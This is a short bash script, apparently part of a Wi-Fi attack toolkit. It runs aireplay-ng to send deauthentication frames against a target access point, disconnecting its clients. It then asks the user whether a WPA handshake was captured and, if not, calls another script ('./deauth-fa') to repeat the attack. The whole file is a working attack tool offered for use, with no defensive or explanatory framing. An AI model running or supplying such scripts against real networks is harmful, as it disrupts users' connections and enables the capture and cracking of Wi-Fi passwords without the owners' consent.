#!/bin/bash
clear

sleep 2
echo "DeAuthenticating Clients ..."
aireplay-ng -0 020 -a $bssid $monInterface
echo "--------------------------------------------------------------------------------"
read -p "Did You Get A HandShake? [yes/no]: " geths
if [ $geths == yes ]
then
  exit
elif [ $geths == no ]
then
  ./deauth-fa
  exit
fi
